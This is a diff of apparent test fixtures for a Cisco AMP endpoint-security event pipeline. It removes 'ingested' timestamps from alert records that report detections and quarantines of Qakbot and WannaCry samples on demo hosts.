@@ -3537,7 +3495,6 @@ ], "code": "2164260880", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376902174Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 2 
@@ -3611,7 +3568,6 @@ ], "code": "1090519054", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376903249Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "severity": 2 
@@ -3701,7 +3657,6 @@ ], "code": "1090519054", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376904207Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 2 
@@ -3783,7 +3738,6 @@ ], "code": "1090519054", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376905196Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "severity": 2 
@@ -3871,7 +3825,6 @@ ], "code": "553648143", "id": "6412604589194871000", - "ingested": "2022-02-02T05:53:05.376906211Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 2 
@@ -3947,7 +3900,6 @@ ], "code": "2164260880", "id": "6419239055241773000", - "ingested": "2022-02-02T05:53:05.376907180Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -4025,7 +3977,6 @@ ], "code": "1090519054", "id": "6419239055241773000", - "ingested": "2022-02-02T05:53:05.376908161Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -4118,7 +4069,6 @@ ], "code": "553648143", "id": "6419239050946806000", - "ingested": "2022-02-02T05:53:05.376909126Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -4194,7 +4144,6 @@ ], "code": "2164260880", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376910259Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4270,7 +4219,6 @@ ], "code": "2164260880", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376911239Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4344,7 +4292,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376912200Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4430,7 +4377,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376913166Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4516,7 +4462,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376914137Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4602,7 +4547,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376915385Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":414000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782275\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4688,7 +4632,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376916398Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":368000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782274\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4774,7 +4717,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376917383Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":134000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782273\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -4860,7 +4802,6 @@ ], "code": "1090519054", "id": "6419229335730782000", - "ingested": "2022-02-02T05:53:05.376918349Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782272\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
